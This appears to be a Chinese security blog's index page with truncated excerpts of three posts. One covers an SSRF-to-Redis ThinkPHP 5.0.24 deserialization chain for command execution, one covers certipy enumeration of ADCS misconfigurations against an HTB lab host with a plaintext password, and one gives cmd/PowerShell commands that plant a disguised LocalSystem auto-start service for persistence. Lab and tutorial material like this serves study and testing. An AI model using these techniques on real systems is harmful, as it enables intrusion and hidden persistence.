竹林寺

Here's something encrypted, password is required to continue reading.

本文技巧概括 (作者理解)： 通过 ssrf 将 thinkphp 5.0.24 反序列化链写入 redis 缓存，再让 php 反序列化 redis 缓存中的序列化内容进行命令执行 # 测试环境 # 框架： thinkphp 5.0.24 # 代码简介： geturl 操作为 ssrf getname 操作为加载 redis 缓存并 dump 出来 我们现在需要做的就是 redis 缓存里面的序列化内容拿到 php 里面执行，从而 getshell # 第一步： 序列化我们的 exp 观众提问：为什么上来就是序列化？ 回答：因为 thinkphp 在 redis 获取代码中，存在反序

正在施工中.....

# 一。使用场景： # 1.1 需要有证书服务器 (ADCS)& 配置错误的域用户密码或 hash # 二。使用步骤： (看使用步骤前，建议先看步骤三注意与踩坑) # 2.1. 查看域用户配置 拿到域用户的 hash 或密码后，用 certipy 工具远程读取用户证书配置是否存在配置错误，如果有错误会显示漏洞存在且打出漏洞名称： certipy.exe find -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -vulnerable -stdout​ 执

竹林寺 cmd powershell 选其一 # 1.cmd 创建自启动服务 sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\test.txt" depend= Tcpip obj= Localsystem start= auto# 2. powershell 创建自启动服务 new-service –Name ".NET CLR Networking 3.5.0.0" –DisplayName "